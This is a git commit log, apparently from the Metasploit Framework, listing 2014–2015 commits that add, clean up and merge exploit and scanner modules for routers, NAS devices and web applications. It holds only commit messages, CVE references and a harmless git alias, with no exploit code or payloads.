Land #5226, @m-1-k-3's Airties login Buffer Overflow exploit 2015-05-29 10:51:32 -05:00
jvazquez-r7 952f391fb4
Do minor code cleanup 2015-05-29 10:49:51 -05:00
Michael Messner 666b0bc34a MIPSBE vs MIPS 2015-05-28 18:50:48 +02:00
Michael Messner 43f505b462 fix contact details 2015-05-25 19:31:50 +02:00
jvazquez-r7 f953dc08d9
Land #5280, @m-1-k-3's support for Airties devices to miniupnpd_soap_bof 2015-05-24 15:17:38 -05:00
Michael Messner 10baf1ebb6 echo stager 2015-05-23 15:50:35 +02:00
Tod Beardsley f423306b6f
Various post-commit fixups
Edited modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb first landed
in #5150, @wchen-r7's DOS module for CVE-2015-1635 HTTP.sys

Edited modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
first landed in #5192, @joevennix's module for Safari CVE-2015-1126

Edited modules/auxiliary/gather/java_rmi_registry.rb first landed in

Edited modules/auxiliary/gather/ssllabs_scan.rb first landed in #5016,
add SSL Labs scanner

Edited modules/auxiliary/scanner/http/goahead_traversal.rb first landed
in #5101, Add Directory Traversal for GoAhead Web Server

Edited modules/auxiliary/scanner/http/owa_iis_internal_ip.rb first
landed in #5158, OWA internal IP disclosure scanner

Edited modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
first landed in #5159, WordPress Mobile Edition Plugin File Read Vuln

Edited modules/exploits/linux/http/multi_ncc_ping_exec.rb first landed
in #4924, @m-1-k-3's DLink CVE-2015-1187 exploit

Edited modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb first
landed in #5131, WordPress Slideshow Upload

Edited modules/exploits/windows/local/run_as.rb first landed in #4649,
improve post/windows/manage/run_as and as an exploit

(These results courtesy of a delightful git alias, here:

```
  cleanup-prs = !"for i in `git status | grep modules | sed
s/#.*modules/modules/`; do echo -n \"Edited $i first landed in \" && git
log --oneline --first-parent $i | tail -1 | sed 's/.*Land //' && echo
''; done"

```

So that's kind of fun.
2015-05-06 11:39:15 -05:00
m-1-k-3 c7e05448e7 various MIPS vs MIPSBE fixes 2015-05-04 12:55:21 +02:00
m-1-k-3 53043dcbbc make msftidy happy 2015-05-03 18:14:51 +02:00
m-1-k-3 6fbce56a52 realtek upnp command injection 2015-05-03 18:09:22 +02:00
jvazquez-r7 1bc6822811
Delete Airties module 2015-05-22 11:57:45 -05:00
jvazquez-r7 70d0bb1b1a
Merge Airties target inside miniupnpd_soap_bof 2015-05-22 11:57:19 -05:00
m-1-k-3 d8b8017e0b remove debugging 2015-04-27 06:36:34 +02:00
m-1-k-3 8db88994ac fingerprint, title 2015-04-27 06:34:46 +02:00
m-1-k-3 285d767e20 initial commit of UPnP exploit for Airties devices 2015-04-27 05:34:30 +02:00
m-1-k-3 f5b0a7e082 include rop gadget description 2015-04-23 00:11:02 +02:00
m-1-k-3 1ec0e09a43 msftidy 2015-04-22 10:32:47 +02:00
m-1-k-3 58099d0469 airties login bof module 2015-04-22 10:21:58 +02:00
jvazquez-r7 3f40342ac5
Fix sock_sendpage 2015-04-21 14:17:19 -05:00
jvazquez-r7 ab94f15a60
Take care of modules using the 'DEBUG' option 2015-04-21 12:13:40 -05:00
jvazquez-r7 4224008709
Delete print_debug/vprint_debug 2015-04-21 11:14:03 -05:00
Michael Messner b991dec0f9 Dlink UPnP SOAP-Header Injection 2015-04-17 22:54:32 +02:00
wchen-r7 4f903a604c Fix #5103, Revert unwanted URI encoding
Fix #5103. By default, Httpclient will encode the URI but
we don't necessarily want that. These modules originally
didn't use URI encoding when they were written so we should
just keep them that way.
2015-04-17 13:59:49 -05:00
Christian Mehlmauer 153344a1dd
fix Unkown typo 2015-04-16 23:59:28 +02:00
Christian Mehlmauer 352e170624
more failure reasons 2015-04-16 22:04:11 +02:00
Christian Mehlmauer ba6548db75
be consistent about naming 2015-04-16 21:44:56 +02:00
Christian Mehlmauer a193ae42b0
moar fail_with's 2015-04-16 21:25:05 +02:00
Christian Mehlmauer 4dc402fd3c
moar fail_with's 2015-04-16 21:16:52 +02:00
Christian Mehlmauer 0e186fa617
first fail_with fixes 2015-04-16 21:08:33 +02:00
jvazquez-r7 ef6bf54e2f
Fix metadata 2015-04-15 09:22:59 -05:00
jvazquez-r7 1da6b32df7
Land #4924, @m-1-k-3's DLink CVE-2015-1187 exploit
* ncc service ping.cpp command injection
2015-04-15 09:17:10 -05:00
jvazquez-r7 6019bbe0d2
Add ranking comment 2015-04-15 09:12:03 -05:00
jvazquez-r7 ad465c4d5b
Do code cleanup 2015-04-15 09:10:18 -05:00
Tod Beardsley 11057e5b3b
Fix up the last couple from Tenable, missed last
[See #5012]
2015-04-02 15:27:46 -05:00
Tod Beardsley 4bbec88882
Various other one-off nonhuman author credits
[See #5012]
2015-04-02 15:25:47 -05:00
Tod Beardsley b17727d244
Switching to privileged => false 2015-04-01 14:35:45 -05:00
Tod Beardsley 0825534d2c
Fix reference 2015-04-01 14:16:45 -05:00
Tod Beardsley 8ec71e9daf
Add a module for R7-2015-05 2015-04-01 14:05:41 -05:00
m-1-k-3 d81a246660 target_uri 2015-03-26 12:16:20 +01:00
m-1-k-3 b7f469b747 feedback 2015-03-26 07:39:36 +01:00
Tod Beardsley 49a6057f74
Grammaring harder 2015-03-24 11:10:36 -05:00
jvazquez-r7 2d1adf6ef4
Land #4923, @m-1-k-3's exploit for overflow on belkin routers 2015-03-22 02:05:35 -05:00
jvazquez-r7 ee74bb3c5b
The default concat operator should be ok 2015-03-22 02:05:02 -05:00
jvazquez-r7 5499b68e02
Do code cleanup 2015-03-22 01:58:32 -05:00
sinn3r 1b67a06d35 No banner var 2015-03-20 02:26:59 -05:00
sinn3r b55ffc9ff1 Change option to FORCE_EXPLOIT 2015-03-20 01:44:10 -05:00
sinn3r d8539ef91a Change datastore option's description 2015-03-19 12:22:42 -05:00
sinn3r a2ba81f84f This should be true (required) 2015-03-19 11:54:03 -05:00
sinn3r d8c8bd1669 Move the details to a wiki 2015-03-19 11:52:17 -05:00
sinn3r 968a8758ad Add CVE-2015-0235 Exim GHOST (glibc gethostbyname) Buffer Overflow
This was originally written by Qualys
2015-03-18 18:51:16 -05:00
Sven Vetsch 4d3a1a2f71 fix all duplicated keys in modules 2015-03-14 13:10:42 +01:00
m-1-k-3 819a49b28a msftidy again 2015-03-12 19:09:52 +01:00
m-1-k-3 2eab258a76 msftidy 2015-03-12 19:07:56 +01:00
m-1-k-3 ccf7314c8f msftidy 2015-03-12 19:05:21 +01:00
m-1-k-3 6fcab31997 ncc exploit CVE-2015-1187 - dir626l 2015-03-12 18:55:50 +01:00
m-1-k-3 64f769504b encoding 2015-03-10 17:47:15 +01:00
m-1-k-3 6657c7d11d Belkin - CVE-2014-1635 2015-03-10 16:49:51 +01:00
William Vu ecd7ae9c3b
Land #4857, symantec_web_gateway_restore module 2015-03-02 15:00:10 -06:00
sinn3r ad28f9767f Use include 2015-03-02 14:41:25 -06:00
sinn3r cb140434f9 Update 2015-03-02 12:59:21 -06:00
OJ 905a539a00 Add exploit for Seagate Business NAS devices
This module is an exploit for a pre-authenticated remote code execution
vulnerability in Seagate Business NAS products.
2015-03-01 13:25:28 +10:00
sinn3r 4a1fbbdc3b Use datastore to find payload name 2015-02-28 19:56:32 -06:00
sinn3r ef9196ba6c Correct comment 2015-02-27 13:27:49 -06:00
sinn3r 7b6c39058a Correct target name 2015-02-27 13:24:57 -06:00
sinn3r 90aff51676 Add CVE-2014-7285, Symantec Web Gateway restore.php Command Injection 2015-02-27 12:31:29 -06:00
jvazquez-r7 0372b08d83 Fix mixin usage on modules 2015-02-13 17:17:59 -06:00
Tod Beardsley bae19405a7
Various grammar, spelling, word choice fixes 2015-01-26 11:00:07 -06:00
jvazquez-r7 b61538e980
Land #4291, @headlesszeke's module for ARRIS VAP2500 command execution 2015-01-21 20:52:31 -06:00
jvazquez-r7 33195caff2 Mark compatible payloads 2015-01-21 20:52:04 -06:00
jvazquez-r7 500d7159f1 Use PAYLOAD instead of CMD 2015-01-21 20:49:05 -06:00
jvazquez-r7 f37ac39b4c Split exploit cmd vs exploit session 2015-01-21 20:46:37 -06:00
jvazquez-r7 e1d1ff17fd Change failure code 2015-01-21 20:38:33 -06:00
jvazquez-r7 169052af5c Use cookie option 2015-01-21 20:37:38 -06:00
sinn3r d45cdd61aa Resolve #4507 - respond_to? + send = evil
Since Ruby 2.1, the respond_to? method is more strict because it does
not check protected methods. So when you use send(), clearly you're
ignoring this type of access control. The patch is meant to preserve
this behavior to avoid potential breakage.

Resolve #4507
2015-01-02 13:29:17 -06:00
Tod Beardsley 264d3f9faa
Minor grammar fixes on modules 2014-12-31 11:45:14 -06:00
jvazquez-r7 121c0406e9 Beautify restart_command creation 2014-12-24 15:52:15 -06:00
jvazquez-r7 43ec8871bc Do minor c code cleanup 2014-12-24 15:45:38 -06:00
jvazquez-r7 92113a61ce Check payload 2014-12-24 15:43:49 -06:00
jvazquez-r7 36ac0e6279 Clean get_restart_commands 2014-12-24 14:55:18 -06:00
jvazquez-r7 92b3505119 Clean exploit method 2014-12-24 14:49:19 -06:00
jvazquez-r7 9c4d892f5e Use single quotes when possible 2014-12-24 14:37:39 -06:00
jvazquez-r7 bbbb917728 Do style cleaning on metadata 2014-12-24 14:35:35 -06:00
jvazquez-r7 af24e03879 Update from upstream 2014-12-24 14:25:25 -06:00
Tod Beardsley d3050de862
Remove references to Redmine in code
See #4400. This should be all of them, except for, of course, the module
that targets Redmine itself.

Note that this also updates the README.md with more current information
as well.
2014-12-19 17:27:08 -06:00
Jon Hart 65b316cd8c
Land #4372 2014-12-11 18:48:16 -08:00
Christian Mehlmauer 544f75e7be
fix invalid URI scheme, closes #4362 2014-12-11 23:34:10 +01:00
Christian Mehlmauer de88908493
code style 2014-12-11 23:30:20 +01:00
headlesszeke 8d1ca872d8 Now with logging of command response output 2014-12-05 10:58:40 -06:00
Tod Beardsley 79f2708a6e
Slight fixes to grammar/desc/whitespace
Note that the format_all_drives module had a pile of CRLFs that should
have been caught by msftidy. Not sure why it didn't.
2014-12-04 13:11:33 -06:00
headlesszeke 564488acb4 Changed and to && 2014-12-02 00:02:53 -06:00
headlesszeke 280e10db55 Add module for Arris VAP2500 Remote Command Execution 2014-12-01 23:07:56 -06:00
Rasta Mouse 985838e999 Suggestions from OJ 2014-11-27 21:38:50 +00:00
Rasta Mouse 25ecf73d7d Add configurable directory, rather than relying on the session working
directory.
2014-11-27 17:12:37 +00:00
OJ 75e5553cd4 Change to in exploit 2014-11-26 16:53:30 +10:00
jvazquez-r7 9524efa383 Fix banner 2014-11-25 23:14:20 -06:00
jvazquez-r7 16ed90db88 Delete return keyword 2014-11-25 23:11:53 -06:00
jvazquez-r7 85926e1a07 Improve check 2014-11-25 23:11:32 -06:00
jvazquez-r7 5a2d2914a9 Fail on upload errors 2014-11-25 22:48:57 -06:00
jvazquez-r7 b24e641e97 Modify exploit logic 2014-11-25 22:11:43 -06:00
jvazquez-r7 4bbadc44d6 Use Msf::Exploit::FileDropper 2014-11-25 22:00:42 -06:00
jvazquez-r7 7fbd5b63b1 Delete the Rex::MIME::Message gsub 2014-11-25 21:54:50 -06:00
jvazquez-r7 eaa41e9a94 Added reference 2014-11-25 21:37:04 -06:00
jvazquez-r7 2c207597dc Use single quotes 2014-11-25 18:30:25 -06:00
jvazquez-r7 674ceeed40 Do minor cleanup 2014-11-25 18:26:41 -06:00
jvazquez-r7 6ceb47619a Change module filename 2014-11-25 18:09:15 -06:00
jvazquez-r7 1305d56901 Update from upstream master 2014-11-25 18:07:13 -06:00
Mark Schloesser 9e9954e831 fix placeholder to show the firmware version I used 2014-11-19 21:23:39 +01:00
Mark Schloesser a718e6f83e add exploit for r7-2014-18 / CVE-2014-4880 2014-11-19 21:07:02 +01:00
HD Moore 6b4eb9a8e2 Differentiate failed binds from connects, closes #4169
This change adds two new Rex exceptions and changes the local comm to raise the right one depending on the circumstances. The problem with the existing model is
that failed binds and failed connections both raised the same exception. This change is backwards compatible with modules that rescue Rex::AddressInUse in additi
on to Rex::ConnectionError. There were two corner cases that rescued Rex::AddressInUse specifically:

1. The 'r'-services mixin and modules caught the old exception when handling bind errors. These have been updated to use BindFailed
2. The meterpreter client had a catch for the old exception when the socket reports a bad destination (usually a network connection dropped). This has been updat
ed to use InvalidDestination as that was the intention prior to this change.

Since AddressInUse was part of ConnectionError, modules and mixins which caught both in the same rescue have been updated to just catch ConnectionError.
2014-11-11 14:59:41 -06:00
Joe Vennix c6bbc5bccf
Merge branch 'landing-4055' into upstream-master 2014-10-28 11:18:20 -05:00
Luke Imhoff 216360d664
Add missing require
MSP-11145
2014-10-27 15:19:59 -05:00
sinn3r 7cb4320a76
Land #3561 - unix cmd generic_sh encoder 2014-10-23 15:48:00 -05:00
sinn3r 13fd6a3374
Land #4046 - Centreon SQL and Command Injection 2014-10-23 13:17:00 -05:00
sinn3r ce841e57e2 Rephrase about centreon.session 2014-10-23 13:15:55 -05:00
sinn3r 889045d1b6 Change failure message 2014-10-23 12:55:27 -05:00
William Vu d5b698bf2d
Land #3944, pkexec exploit 2014-10-17 16:30:55 -05:00
jvazquez-r7 7652b580cd Beautify description 2014-10-17 15:31:37 -05:00
jvazquez-r7 d831a20629 Add references and fix typos 2014-10-17 15:29:28 -05:00
URI Assassin 35d3bbf74d
Fix up comment splats with the correct URI
See the complaint on #4039. This doesn't fix that particular
issue (it's somewhat unrelated), but does solve around
a file parsing problem reported by @void-in
2014-10-17 11:47:33 -05:00
0a2940 e689a0626d Use Rex.sleep :-)
"Right is right even if no one is doing it; wrong is wrong even if everyone is doing it"

user@x:/opt/metasploit$ grep -nr "select(nil, nil, nil" . | wc -l
189
user@x:/opt/metasploit$ grep -nr "Rex.sleep" . | wc -l
25
2014-10-10 10:05:46 +01:00
sinn3r c5494e037d
Land #3900 - Add F5 iControl Remote Root Command Execution 2014-10-08 00:30:07 -05:00
jvazquez-r7 299d9afa6f Add module for centreon vulnerabilities 2014-10-07 14:40:51 -05:00
jvazquez-r7 3daa1ed4c5 Avoid changing modules indentation in this pull request 2014-10-07 10:41:25 -05:00
jvazquez-r7 341d8b01cc Favor echo encoder for back compatibility 2014-10-07 10:24:32 -05:00
jvazquez-r7 0089810026 Merge to update 2014-10-06 19:09:31 -05:00
jvazquez-r7 212762e1d6 Delete RequiredCmd for unix cmd encoders, favor EncoderType 2014-10-06 18:42:21 -05:00
0a2940 f2b9aeed74 typo 2014-10-03 11:02:56 +01:00
0a2940 f60f6d9c92 add exploit for CVE-2011-1485 2014-10-03 10:54:43 +01:00
Brandon Perry 2c9446e6a8 Update f5_icontrol_exec.rb 2014-10-02 17:56:24 -05:00
Tod Beardsley 4fbab43f27
Release fixes, all titles and descs 2014-10-01 14:26:09 -05:00
William Vu 039e544ffa
Land #3925, rm indeces_enum
Deprecated.
2014-09-30 17:45:38 -05:00
Brandon Perry 161a145ec2 Create f5_icontrol_exec.rb 2014-09-27 10:40:13 -05:00
jvazquez-r7 f2cfbebbfb Add module for ZDI-14-305 2014-09-24 00:22:16 -05:00
Jon Hart 495e1c14a1
Land #3721, @brandonprry's module for Railo CVE-2014-5468 2014-09-09 19:10:46 -07:00
Jon Hart 26d8432a22
Minor style and usability changes to @brandonprry's #3721 2014-09-09 19:09:45 -07:00
Brandon Perry db6052ec6a Update check method 2014-09-09 18:51:42 -05:00
Jakob Lell 3e57ac838c Converted LD_PRELOAD library from precompiled binary to metasm code. 2014-09-04 21:49:55 +02:00
Brandon Perry ee3e5c9159 Add check method 2014-09-02 21:35:47 -05:00
Brandon Perry 438f0e6365 typos 2014-08-30 09:22:58 -05:00
Brandon Perry f72cce9ff2 Update railo_cfml_rfi.rb 2014-08-29 17:33:15 -05:00
Brandon Perry f4965ec5cf Create railo_cfml_rfi.rb 2014-08-28 08:42:07 -05:00
Jakob Lell 052327b9c6 Removed redundant string "linux_" from exploit name 2014-08-27 23:33:15 +02:00
Jakob Lell b967336b3b Small bugfix (incorrect filename in data directory) 2014-08-25 00:39:00 +02:00
Jakob Lell fc6f50058b Add desktop_linux_privilege_escalation module 2014-08-25 00:05:20 +02:00
jvazquez-r7 f6f8d7b993 Delete debug print_status 2014-07-22 15:00:03 -05:00
jvazquez-r7 b086462ed6 More cleanups of modules which REALLY need the 'old' generic encoder 2014-07-22 14:57:53 -05:00
jvazquez-r7 3d7ed10ea0 Second review of modules which shouldn't be affected by changes 2014-07-22 14:33:57 -05:00
jvazquez-r7 5e8da09b2d Allow some modules to use the old encoder 2014-07-22 14:28:11 -05:00
jvazquez-r7 b0f8d8eaf1 Delete debug print_status 2014-07-22 13:29:00 -05:00
jvazquez-r7 f546eae464 Modify encoders to allow back compatibility 2014-07-22 13:27:12 -05:00
William Vu ff6c8bd5de
Land #3479, broken sock.get fix 2014-07-16 14:57:32 -05:00
Tod Beardsley 6c595f28d7
Set up a proper peer method 2014-07-14 13:29:07 -05:00
Michael Messner 1b7008dafa typo in name 2014-07-13 13:24:54 +02:00
jvazquez-r7 8937fbb2f5 Fix email format 2014-07-11 12:45:23 -05:00
jvazquez-r7 eb9d2f130c Change title 2014-07-11 12:03:09 -05:00
jvazquez-r7 a356a0e818 Code cleanup 2014-07-11 12:00:31 -05:00
jvazquez-r7 6fd1ff6870 Merge master 2014-07-11 11:40:39 -05:00
jvazquez-r7 d637171ac0 Change module filename 2014-07-11 11:39:32 -05:00
jvazquez-r7 c55117d455 Some cleanup 2014-07-11 11:39:01 -05:00
jvazquez-r7 a7a700c70d
Land #3502, @m-1-k-3's DLink devices HNAP Buffer Overflow CVE-2014-3936 2014-07-11 11:25:03 -05:00
jvazquez-r7 b9cda5110c Add target info to message 2014-07-11 11:24:33 -05:00
jvazquez-r7 dea68c66f4 Update title and description 2014-07-11 10:38:53 -05:00
jvazquez-r7 f238c2a93f change module filename 2014-07-11 10:30:50 -05:00
jvazquez-r7 f7d60bebdc Do clean up 2014-07-11 10:28:31 -05:00
jvazquez-r7 8f3197c192
Land #3496, @m-1-k-3's switch to CmdStager on dlink_upnp_exec_noauth 2014-07-11 09:50:57 -05:00
jvazquez-r7 4ea2daa96a Minor cleanup 2014-07-11 09:50:22 -05:00
jvazquez-r7 51cfa168b1 Fix deprecation information 2014-07-11 09:47:30 -05:00
jvazquez-r7 611b8a1b6d Modify title and ranking 2014-07-11 09:35:21 -05:00
jvazquez-r7 a9b92ee581 Change module filename 2014-07-11 09:17:56 -05:00
jvazquez-r7 36c6e74221 Do minor fixes 2014-07-11 09:17:34 -05:00
Michael Messner 109201a5da little auto detect fix 2014-07-10 20:45:49 +02:00
Michael Messner 781149f13f little auto detect fix 2014-07-10 20:40:39 +02:00
Michael Messner f068006f05 auto target 2014-07-09 21:53:11 +02:00
Michael Messner 6a765ae3b0 small cleanup 2014-07-09 21:16:29 +02:00
Michael Messner 0674314c74 auto target included 2014-07-09 20:56:04 +02:00
Michael Messner b4812c1b7d auto target included 2014-07-09 20:53:24 +02:00
Michael Messner f89f47c4d0 dlink_dspw215_info_cgi_rop 2014-07-08 22:29:57 +02:00
Michael Messner 6fbd6bb4a0 stager 2014-07-08 22:17:02 +02:00